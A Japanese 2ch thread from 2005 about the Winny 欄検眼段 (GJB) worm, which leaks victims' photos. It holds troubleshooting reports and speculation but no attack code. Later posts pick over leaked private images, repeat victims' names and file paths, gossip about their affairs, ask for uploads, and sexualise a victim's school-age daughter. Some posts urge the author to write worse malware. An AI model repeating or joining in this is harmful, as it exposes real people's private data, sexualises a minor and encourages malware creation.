言われる点。そういう作者の意図とは別の次元で拡散防止を図ることが困難になっている。笑
ヤフーのトップに載ったら載ったで、「作者が自分で通報したんじゃないのか？ぷぷぷ」ってなるんだろうな。ｗ

>>818
>別に作者じゃないけど、もっと他のスレにも宣伝して警戒させるべきでは？
宣伝って、某スレのこんな書き込みのことかな？
504 名前：[名無し]さん(bin+cue).rar[ ] 投稿日：05/03/12 09:43:01 ID:7LP9q65V0
あのう。
それより、欄検眼段がすごいことになってる、みたいな。
GJBはJPGにリネームすればOKらしい。

>>822
作者乙

>>818
新作のたびにそんなことできるか
面白いﾆｭｲﾙｽならまだしも
こんな平々凡々なもの

アホばっか

>>826
作者乙

>>826
基地外殿、毎日乙

考えてみるとPC内のｊｐｇがバラまかれるって意外にダメージないんだよな。
画像じゃあんまり個人情報を読み取れないし。

>>829
メーラーの送信者情報をアーカイブに添付してくれると、かなり
えらいことになるような悪寒。

いっそ「欄検眼段の作者だけど何か質問ある？」
ぐらいのスレ立てればよかったのにな＞作者

作者真っ赤になってますよ

Antinny史上、ここまでバカにされた作者がいたであろうか？

よっぽどの自信作だったんだろうな
自分でスレ立ててたし

証拠もないのに自分で立てたとか決めつけるなよ。

よくわからないけど、必死な人がいますね

>>835
乙

作者はよく頑張った
だからゆっくり休めみゃ

作者、あらゆるアプロダでﾃﾞｽｸﾄｯﾌﾟを晒すｳｨﾙｽを作ってこい。
警視庁に個人情報を送るｳｨﾙｽでもいい

この屈辱が新たなニュイルス作りのモチベーションとなる

これだけ必死になっているのに、
他板はともかく他スレで話題にものぼらないとは…

作者はもっと宣伝してまわらなきゃ駄目じゃね〜の？

作者が同情や激励されるっていう意味では、たしかに前代未聞だった
な。(w

ヨドバシじゃなくてビッグカメラのディスプレイ売り場のデスクトップにnyに流れてるファイルが置かれてた事があったな。

作者は発想を変えて世の為になるｳｲﾙｽを作ろうよ

ﾏｲﾅｰだけど使い勝手の良いｱﾌﾟﾘを次々ｲﾝｽﾄｰﾙしてﾃﾞｨｽｸﾄｯﾌﾟにｼｮｰﾄｶｯﾄかﾗﾝﾁｬｰをおいたり
ｽﾊﾟｲｳｴｱを駆除したり
ＸＰ高速化させたり

苺キンタマやキンタマが相当評判になったから、じゃあPCの中の
画像を勝手に探して放流すれば大混乱になると思ったんだろうなあ。
しかし実際には個人が作った画像にはたいした情報価値はなかったと。

>>844
ノートン先生を勝手にインスコするウィルスとか
トレンドマイクロのアップデータも先生で使えるようにするとか

ﾉｰﾄﾝ先生を勝手にｲﾝｽｺして、自分は駆除されて消える
完璧

たしか、ワームを防ぐパッチをあてるワームがあったと思うが
なんだっけ？

おまいらが煽るから怖くなって重要ファイルは全部暗号化したぞ
というか今までそれすら対策してなかったのって．．． ｶﾞｸｶﾞｸ(((；ﾟДﾟ)))ﾌﾞﾙﾌﾞﾙ

重要なファイルを入れておかなきゃいいのに

2chブラウザのカキコログなどtxtファイルうｐなら祭りだっただろうなぁ。

>>844
そういや特定のウイルスを駆除するウイルスがあったな。
ただし、結果的にネットワークに負荷をかけながら延々と感染し続けると言う意味では、
どっちも同じだったが。

ＧＪＢ画像ﾀﾞｳｿして外付けＨＤに保存したらＨＤ内のファイルが大量に消えた
これが本当の原因かどうかはわからんけど、怪しいexeを実行した覚えはないし…

欄検眼段って一体何？
どこにも詳細書いてないんだけど

MyDoomとNetskyじゃなかったっけ。お互いの悪口なんかも書かれていたとか。

症状：exe踏んだらﾊﾟｿｺﾝ動作が速くなりました

って報告か・・・いいね

あぁ？殺すぞ

もちつけ

（＞_＜）ｶﾞｸｶﾞｸ　　ﾋｰ ｵﾄﾞｻﾅｲﾃﾞｸﾀﾞｻｲ-

↑くだらん雑談uzeee　ここは情報スレだろが

ウィルス初心者・教えて厨・スキルねえクソは消えれ　

そりゃそうと、

欄検眼段って何て読むか今すぐ教えろ

（＞_＜）　ﾋｰ

>>860
検索もできないのか？

らんけんがんだんの作者様
次は、ny未導入のPCに自動的にny導入＆自動で設定まで済ますものか、
または犯罪予告カキコをあちこちに自動投稿するものにしてください。

世の中がいろんな意味で変わると思います。
世間を騒がすこと間違いなしです。

依頼は良くないなぁ・・。

【使用OS】 ＸＰ
【WindowsUpdateしてるか】 あんまりしてない
【使用AntiVirusソフト】 etrust
【AntiVirusをUpdateしてるか】 してる
【ウイルススキャンの結果】 してる途中にＰＣが凍る
【オンラインスキャンしたなら結果】 してる途中にＰＣが凍る
【Winnyのﾊﾞｰｼﾞｮﾝ】 最新
【Winny歴、総DL量】 2年　５００Ｇくらい
【テンプレを読んだか】 呼んだ
【テンプレにある対策を実行したか】 した
【症状、具体的に分かる限りすべて書く】
Winny起動するとＰＣが凍る。
ダウンフォルダをスキャンすると凍る。ダウンフォルダ捨てようとしても凍る。
何これぇ・・・

【何をしたらそんなことになったのか】不明
【これまでにとった措置】スキャン

これってウィルスなんでしょうか？スキャンすらできないなんて・・・

HDD臨終間近

ｺﾝﾔｶﾞﾔﾏﾀﾞ

うっそぉ

>>868
外付けでも何でもいいから今すぐ新しくHDDを購入してデータ移しとこう。
今使ってるHDDはキャッシュ用にでも使おう。

今夜が山田（＞_＜）

これだけ負の話題で騒がれてるのに感染した、って報告がないってのは
もしかして欄検眼段自体が自演なのでは？

その説は真っ先に指摘された

とりあえずダメージあるとすれば
辻のおっちゃんが児童ﾇﾙﾎﾟでﾀｲｰﾎ

そして
ﾌｼﾞが
独占ｽｸｰﾌﾟ!関西に続き東京ﾀｲｰﾎの瞬間

6分後に思いついてわざわざ書き込んだの？

>>873
自動ｶﾞｯ!!

ｾｸｰｽ中だから6分かかったの
児童ﾎﾟﾙﾇと書くつもりが間違えたじゃないか
しかもｶﾞｯされたじゃないか

そして
おやすみage

赤ちゃんと一緒に写ってる女のこのフェラ画像が？？？
同じ人から流出してるっぽいし。

でGJBは怖いウイルスなの？

欄検眼段については、ずいぶん前から流れてるんだが、それらしきワーム本体が今のところ未確認なんだよ。
ただ、自作自演でないのは明らかだし、トリップが固定されてるところからも
nyを狙ったものだとは分かるのだが

以前、解析を試みた 偽造解除.xxx は、すでに先生がTrojan Horseとして識別済み
まだ懲りないの？.xxx は、未識別。これやも知れん。

>880
感染者が気付かないという点では、巧妙になってるので、それなりに怖いけどな
今のとこ JPEG → GJB にして流すだけだが、ユーザー名とフォルダ階層はばれる
ほかに 何をしてるか 判明してない

ファイル名からおおよその住所や名前写真ばら撒かれてる人とかいるな。
かわいそうに。

欄検眼段のおすすめファイルを教えて君

【使用OS】WindowsXP
【WindowsUpdateしてるか】していません
【使用AntiVirusソフト】NOD32
【AntiVirusをUpdateしてるか】毎日チェック
【ウイルススキャンの結果】あるはずのないファイルが NOD32スキャン（ウイルス警告）表示される
落とした動画を見ていると良くWindows Media Playerが固まる
　　　　　　　　　　　　　タスクマネージャー→タスク→WMPのタスク終了をしないと起動しない
【オンラインスキャンしたなら結果】 あるはずのないファイルが NOD32スキャンで表示される
【Winnyのﾊﾞｰｼﾞｮﾝ】v2,0 b7.1
【Winny歴、総DL量】8ヶ月くらい
【テンプレを読んだか】読みました
【テンプレにある対策を実行したか】どの対策が良いかわからない
【症状、具体的に分かる限りすべて書く】Winny2MemPatchを試しに使ったのが原因かも
　　　　　　　　　　　　　　　　　　　あるはずのないファイルはウイルス？
　　　　　　　　　　　　　　　　　　　最近Zone Labs Securityに頻繁にポートスキャン警告が
　　　　　　　　　　　　　　　　　　　00.000.000 (port 000)からのアクセスを遮断と良くでる
【これまでにとった措置】UPフォルダ＆アップTXTファイルを消去、毎日スキャン、Zone Labs Security
　　　　　　　　　　　　PROを購入、重要ファイルを外付けHDDに移動、winny使用停止、開放ポート閉

その「あるはずのないファイル」ってのは検出されたファイルのパスが存在しないって事？

>>885
そうです、調べていてウイルスが作ったファイルのキーワード（素人）などが
含まれているのですが、このファイルに個人情報は含まれますか？

池沼の書き込みです、皆さん苦笑してやってください。
↓

欄検眼段_D__デジカメ_EZTOUCH_ＭＩＹＯＫＯ_〇秘_

欄検眼段_C__DOCUMENTS AND SETTINGS_ひで_MY DOCUMENTS_MY PICTURES_雑_

このシリーズは・・・

>>884
Winny2MemPatchにはメール砲仕込まれてるVer.もあるからな。アウト。
あるはずのないファイルをどうやって検出するのかと小一時間。

欄検眼段の本体探しのために、ダミーPC起動を決意。そのうち地引きに
ネタが繋るかも…。

湯沢雄勝合併協議会が晒されてるな

一番最初にGO BACK落とせば良いのに。

>>889
それクラック版ではガセ決定だが。

失礼クラックスレ。

ﾎﾟｯﾎﾟｰ　(´ ＼ 　|　＿＿＿＿＿＿＿＿＿＿／ヽ　　　　　　 / 
　　 　 　 　 .l l ＼| |　！ノートン先生　！　／/U　ヽ＿＿＿/ 
パソコン蛾人　　＼　！！大激怒！！　／／　　　U　　　　:::U: 
ぶっ壊れ（＿_） 　　＼　！！！！！　／　/／ ＿__　　　＼　　::: 
たお！　（＿＿） 　　　＼∧∧∧∧／　　 |　　|　　 |　　　　U :::: 
　　　　 （`Д´＃）　　　＜　ぶ パ　＞　　　|U　|　　　|　　　　　::U: 
　　 ＿|￣￣||＿）＿　＜　　っ　ソ ＞　　　 |　├―-┤　U.....:::: 
　／旦|――||/／ ／|　＜　壊 コ　＞　　　　ヽ　　　　　.....::::::::: 
─────────＜　れ ン　＞────────── 
<　　 ＿,ノ , 、ヽ､＿　ノ＜　た　蛾＞　　ﾌﾟｽﾌﾟｽﾌﾟｽ･･・・・∬∬ 
　（y○'）｀ヽ) ( ´（y○'）＜　 !!! 　　＞踏んじゃったよぉ＿＿＿ 
　　⌒　/　　　　ヽ⌒　／∨∨∨∨＼　　　∧＿∧　　|｜＼　　 
うわあ |~￣￣~.|ぁぁ／パソコン蛾ぶ ＼　（ ；´Д｀）　 |｜　｜ 
ぁぁ|　|||! i: |||! !|ぁ／っ壊れた！ディス　＼（　　つ／￣|｜／ 
ぁぁ| |||| !! !!||| :|／プレイが砕け散った！ ＼ヽ　|二二二」 

>>891
そしてそのGo BackにWhiterやbatウイルスが仕込まれている現実。
システム復旧系のアプリは、ほとんど細工されてると思って間違いない。

テンプレに

XMLのOBJECT要素によってコマンドを起動するバグ対策に、
　HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0にあるFlagsの値を
　10進数で1に変更する。

と、書いてあるのですが　やり方がわかりません・・・　
どなたか教えて頂けないでしょうか？

ageてしまってすみませんでした

896ですが自己解決しました
ご迷惑おかけしました

つーかよくメ・・・いやなんでも。

>>892-893
本家というか最初のオリジナルには、確かに何も仕込まれてないが
それ以降のものは、府警アドレスが仕込まれてるのだが…
（ガセと信じたい気持ちも分かるが、ヘンなもんに手を出すのは寄席）

さっさとシマンテックに提出しろクズ

昨日の夜ｎｙ落として一時間ほどで「キャッシュが不足しています」って出て、
落とせなくなったんで切ったら何回電源入れても「何とか　is　missiing」って出てウィンドウズが起動しなくなっちゃった・・
結局再インストしたんだけど、これってウィルスだったのかな

>>902
情報が不足しています

>>902
知識も不足しています

アホばっか

実行したら「捏造です、ついでにウィルスいれときますね( ´,_ゝ`)ﾌﾟｯ」みたいなダイアログの出る
exe踏んでしまったんですが、既出だとは思うのですが、どういう内容とか調べられるところは
ないでしょうか？　一応色々見てみたのですが自信がなくて・・・。

>>906
括弧内の文を見る限りVB厨な感じがする。
しかもダイアログ出して喜んでそうなタイプに思える。

>>888
気になるよな・・

>>906
自信がなければクリーンインスコ
それがニュイルススレクォリティ

嫌なら窓から(ry

>>908
Hなの？

欄検眼段ってデジカメそのまんまの画像が多いから、フォトショップなんかの
画像用アプリに本体が紛れ込んでるのかな？

とりあえず実行前、後ともにノートン先生は反応なし、プロセスも変わったところはない…と思う。
気休めにシステムの復元しておきましたがイタズラのような気がします。
何かあったらまた報告に来ます。ありがとう。

>>910
もしかしてオリジナルエロ画像？って感じ。

>>912
拾え始めたが、そうみたいだね。グッジョブ！！

ちらっと一枚うｐしてみてよ

このひでさん、中３の娘さんがいて、家族旅行とかも行ってるんだけど
複数の女の人と浮気してるっぽい。援助交際かも。
オレがこう言うのも筋違いなんだけど、娘さんが思春期なんだから
色んな女と浮気するのはどうかと思う。

ひでさんおもしろいな。男の中の男だぜ！

娘さん素直そうな可愛らしい子なのになあ。娘さんがPCの中身を見たら傷つくから気を付けてほしい。
ひでさんの個人情報が分かったら、その辺の所をメールか電話で注意したい。笑

娘さんのセクシーショットもなかなか(;´Д｀)ﾊｧﾊｧ

ひでさん、浮気写真と家族写真を同じレベルの階層に置いてあるっぽいけど
大丈夫なのかな？

なんか個別スレ立ってるYO

[欄検眼段]新手のウイルス[GJB]
http://tmp4.2ch.net/test/read.cgi/download/1110716092/l50

釣りじゃないならうｐってくれよ

>>920
作者がやっとかまってもらえてうれしいようです。

>>920
ここで相手にされないからって、作者必死だな。(w

素晴らしいッッ！！！！
これがッッ！！！！ニュイルスクオリティッッッ！！！！

EZTOUCHも浮気してるな。奥さんは出産したばかりなのに。

ｊｐｇで判る個人情報は結局浮気ぐらいが関の山ってことか。

>>900
いや、だからそれ、ＮＹで流れてる奴だろ？

欄検眼段の感染元ってなんなんだろ？

>>928
作者の脳内ウィルス。
朝起きたらすべては夢だったのさ、おしまい。ってネタです。

ひでさんは鈴鹿に何を見に行ったのか。小一時間問いつめたい。

ヒント・おしり

今頃、GJB=ｸﾞｯｼﾞｮﾌﾞだったのかと気付いた風呂あがり...
なんでこんな拡張子にしてるのかとｵﾓﾀ

個別スレで騒いでる3へ

先に踏んだ人間からアドバイスさせてもらうと、めんどくさがらずに
Windowsの入れ直しを勧める。

システムの復元ができなくなったり、ゴミ箱へファイルを捨てるときに
やたら時間がかかったりでWindowsのサービス自体が結構いじられ
てたので、結局入れ直させざるをえなかった。

>>933
センキュ！
OS入れ直します！

自衛隊の写真、コンパニオンと楽しそう・・・・

あれ？　数日見てないうちにGJB大人気だな。
あれだけ作者相手にして貰えなかったのに。

感染元はなんなんだろ？

娘：三好由布子

お気に入りは、かすみんとYAYOIかな。

YAYOIって公開されてるの？ﾁｸｰﾋﾞ写真とか。

・感染源が分からない
・トリップが同じ

実はｎｙで広まるウイルスではなく、
作者が何らかの手法で自動収集した画像をアップし続けているだけとか・・？

>>940
そうだと思う。

真偽は知らぬが、欄検眼段の知名度向上を工作したり、
放流された画像を見てﾆﾔﾆﾔしたりするだけなら、このｽﾚ的に無益だわな

有用なのは、被害に気付いた感染者か実行ファイルを突き止めた人が
提供する情報・客観的事実だけ

ウィルスとは違うんだけど…↓みたいなのがｎｙに輸入されたみたいだ

おいお前ら　面白いもんつくったぞ。
http://ex7.2ch.net/test/read.cgi/news4vip/1110734293/

1 名前：以下、名無しにかわりましてVIPがお送りします 投稿日：05/03/14 02:18:13 ID:/3Gmdw0M0
ttp://pcqa.s3.xrea.com/upload/source/up0132.zip
これ。　zipの状態では1.5Mだけど、解凍すると1.5G

スゲー　て圧縮出来てる訳じゃなくて
起動→ファイル作成なんだろうけど
早速落としてみよ

19 以下、名無しにかわりましてVIPがお送りします New! 05/03/14 02:28:00 ID:/3Gmdw0M0
>>15
んーとな、とりあえず圧縮ってものはなんなのか一行で説明してやろう



AAAAAAAAAABBBBBCCC　　→　A10B5C3　　　　　こんなかんじ

>943
なんでlzhで圧縮しなかったんだろうな？

ここの連中って笑えるな。

ttp://read.kir.jp/file/read0051.zip
飽きた

>>940-941
欄検眼段については依然として調査中
共通トリップだが、接続ノード(IP)を見てると、てんでバラバラ
同一作者が流し続けているブツとは考えにくい。何らかのワーム説を主張する
>>942
同意、感染者を特定にしにくいのがネック。ダミーPCで怪しげなのを踏んでは
みてるが、未だ流れた形跡なし。アプリ系に仕込まれてるとなると、落とすのは
ともかく実験目的で動かすのもリスクだしな。感染源を探すのも楽じゃない。

怪しげなexe（いかにもﾆｭｲﾙｽだが、先生は反応しないようなブツ）を入手したら
そこらのUpロダにパスロックかけた上で開陳してくれ。俺、今ひまだし。

>>943
低レベル杉! 藻まいら THcomp --- Tower of Hanoi compress も知らんのか？

# なんなんだこれは．どんなファイルも１バイトになるぞ．
# どーなっとるんだ？

欄検眼段落としまくりんぐ
おもすれーーーーーー

野村町消防団
欄検眼段_C__DOCUMENTS AND SETTINGS_ひで_MY DOCUMENTS_MY PICTURES_家_秀＆幸江＆ゆうこ　2003. 7.27_00015
これって娘とのハメ撮り?
足の位置を考えるとそう見える

>>951
その2分前にはPCの前でピースしてる。

感染したかどうすればわかるの？

このファイルおとして開いたからって
感染するわけじゃないんでしょ

とっとと答えろや！ちんぽこんドモ！

>>955
君には無理だな

わからねぇヤツがエラそうにｗ

>>950

お勧め教えろ。

一枚ここにうｐしてくれ

誰か必要なコーデックを勝手に取りに行ってくれるようなワーム開発しろ

ＧＪＢウイルスでわかった事はここにいる奴等は偉そうなこと言いながら
知識はほとんど無いってことだな。
サイインスコしろばっかｗ
頭わりーよ。

>>961
春厨キター

欄検眼段、全部同じトリップの奴が流してるんだが
観戦してるのこいつだけか？

ﾜﾗっていいのか？

>>961
知識のないやつに説明するのはﾏﾝﾄﾞｸｾ
知識のあるやつはそもそもここで質問しなくても解決する
よって、必然的に「再インスコしてこい」となるわけだ

>>963
ﾊﾊﾊ

>>963
ｷｯﾄ作者ﾀﾞﾖ

>>963
一人ってことないと思うんだが　感染したやつ全部同じトリであげられるんじゃねーのか？

つーか、欄検眼団って、PCに散乱したJPG画像を、手間かけることなくnyでupできる便利ツールってことで良いか？

日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。

>>967
PC内で忘れかけてたイイ画像が発掘できたりするからイイかもなー

普通にドライブ内.jpg検索でいいじゃん・・・・・・・・・・・

欄検眼段で確認した分では秋田の自治体ＰＣ、その他大阪と広島の自治体か工事関係者の
仕事用写真（現場記録写真）。西日本の個人のプライベートエロと公民館写真。
オレが偶々なんかもしれないが、なんか市町村レベルの地方公共団体っぽいのが多い。

ひでのファイルで判る事。

http://tmp4.2ch.net/test/read.cgi/download/1110118245/690-706

>>972
作者乙

ひーでひーでひーでひーでひーで！

欄検眼段ってかなりの量が流れてるね。600M程落としたけどもう秋田

欄検眼段の作者がまたスレを立ておった
tmp4.2ch.net/test/read.cgi/download/1110716092/

存在しないウイルスの噂をでっち上げて、どれだけ流布できるか
実験してるグループがある、という仮説を覆す証拠ﾏﾀﾞｰ(ﾁﾝ

>>965
おまいは何様だよ(# ﾟДﾟ)
わからない奴にわからせるように説明しろや！
それが真に知識を持ってる奴のすることだろ！

結局「再インスコ」しか言えない奴って他者とマトモなコミュニケーション
出来ないんだろ？それともただわからないだけとか？ｗだったらそう言えｗ

>>978
つーか知識も何も実際その実行ファイルを手に入れて解析(動作確認でも良い)しないと
きちんと調べる事なんてできないだろ。未知のプログラムなんて実際に自分で見てみないと
はっきりした答えなんて言える訳がないだろ。質問するような奴が提供してくる情報なんて
不足してるだろうし何しろ正しいかどうかも分からないんだから答えようがねーだろ。

逆ギレしてる奴はよっぽど困ってるんだろうなｗ

あと俺は>>965ではないが

>わからない奴にわからせるように説明しろや！
>それが真に知識を持ってる奴のすることだろ！
何を勘違いしてるんだか知らないけどここは学校じゃないですよ？
お前らも俺も「分からない時は聞きなさい」と言われて育てられたから
そう言いたくなる気持ちは分からないでもないけど知識を持ってる人は
先生じゃないんだから教えるも教えぬも自由。
答えるまでもない質問やあまりに初歩的な質問に答える気なんか沸か
ねーよ。例えば自分が自己解決したような質問なんか答える気0って
感じだな。

知識や経験や年齢を問わずネットユーザは皆同じに1ユーザなんだよ。
まずはネットマナーでも勉強したらどうかな？ｗ

>>978
仕事だったらやるけどな、そんな疲れる作業をする気はサラサラない。

だいぶお困りのようですね

あとここで「どうせ知識ないんだろ」なんて煽ってる奴らは
自分で解決できないからって僻まないようにしてくれよｗ

つーかほんと自分のやってる事自体把握してなさそうな奴
ばかりじゃねーか。ただでさえブロードバンドが普及して
ネットの在り方なんてそっちのけの一般ユーザがP2Pに
舞い込んできてウザかったのにネットラ●ナーみたいな
雑誌が更に引きずり込んでくれたもんだからほんと今
最悪だな。

結局は釣りなんだ　無視しようよ

次スレの季節です。

>>965 
おまいは何様だよ(#ﾟДﾟ) 
わからない奴にわからせるように説明しろや！ 
それが真に知識を持ってる奴のすることだろ！ 

結局「再インスコ」しか言えない奴って他者とマトモなコミュニケーション 
出来ないんだろ？それともただわからないだけとか？ｗだったらそう言えｗ 




>>978の顔文字に余計なスペースがあったので直しといた

次・ス・レ !!
次・ス・レ !!

>>987
ごめん、965じゃないけどお前の言うこと理解できない。
わかってるから面倒なんだよ。同じ事何度もそこら辺で言ってられるかっつーの。それこそ馬鹿だ。
知識を持ってる奴が「出来る事」であって「する（べき）事」ではないよ。

ここは新種のワーム＆ウィルスのスレ

ウイルスを解析しようって気概のある奴はいねーのなｗ
じゃあなんでここに来てるんだよおまえらｗ

何か興味深いウイルスがでてくるかもしれない。
もしくはすごいマヌケに出会えるかもしれない。

ニュイルススレなんだからニュイルスの情報があれば別に問題ないじゃん

次スレマダー？

緊急引越し先↓
[欄検眼段]新手のウイルス[GJB]
tmp4.2ch.net/test/read.cgi/download/1110716092/

>>991
貴殿は解析しようって気概があるようなので、頑張って解析してくれ。

httpつけろ

知っているがお前の態度が気に入らない

ははは

999

1000

このスレッドは１０００を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。